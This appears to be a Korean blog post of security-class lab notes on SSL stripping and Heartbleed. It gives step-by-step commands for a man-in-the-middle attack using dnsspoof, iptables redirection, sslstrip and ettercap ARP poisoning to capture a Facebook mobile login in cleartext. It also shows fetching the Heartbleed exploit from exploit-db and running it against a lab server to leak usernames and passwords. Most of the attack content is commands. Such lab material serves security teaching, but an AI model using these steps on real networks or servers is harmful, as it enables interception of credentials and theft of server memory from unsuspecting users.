SSL Strip : 보안통신을 평문통신으로 변조
일반 브라우저에 입력
http://m.facebook.com 을 입력 https://m.facebook.com 으로 변환된다.
# vi dns.hosts
# dnsspoof -f ./dns.hosts
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# ifconfig eth0 promisc
# ifconfig 명령어로 promisc 모드 확인
# fragrouter -B1
# ssl -l 10000
etthercap -G > unified sniffing > hosts:host list >
Hosts-Scan for Hosts 로 호스트 IP 리스트 가져오기
add target 1 : 2008
add target 2 : GW
Mitm - arp poisoning (두 개 다 체크 하기)
start > start sniffing
2008에서
# ping m.facebook.com
했을 때 칼리 주소 뜨면 스니핑 된 것
2008에서 http://m.faceboo.com 으로 접속해서 로그인 시도해보면
칼리에서 패킷을 볼 수 있다. 로그인한 내용을.
HeartBleed
APM 웹 사이트 켜주고,
root@kali:~# wget https://www.exploit-db.com/download/32745 -O heartbleed.py
root@kali:~# chmod 755 heartbleed.py
# python heartbleed.py 200.200.200.149 (<- 웹페이지 주소)
코드만 실행시켰을 뿐인데, 아이디랑 패스워드가 뜨는 것을 확일할 수 있다.
PAYLOAD 값이 최대값을 넘어가서 뒤에 있는 내용까지 다 가져오게끔.
예를 들어, hello 라고 쳤으면, 글자수만큼만 5바이트만 응답해줘야하는건데, 16384바이트만큼 다 가져오게 해서
서버의 내용들을 볼 수 있게한다.
'INFOSEC > NETWORK' 카테고리의 다른 글
VPN (가상 사설망) (0) | 2019.11.14 |
---|---|
WAPPLES 실습 (Stored XSS / CSRF / File Upload 공격 차단) (0) | 2019.11.13 |
Web Application (0) | 2019.11.07 |
SQL Injection Vector (WebTest) (0) | 2019.11.04 |
SSL (0) | 2019.10.21 |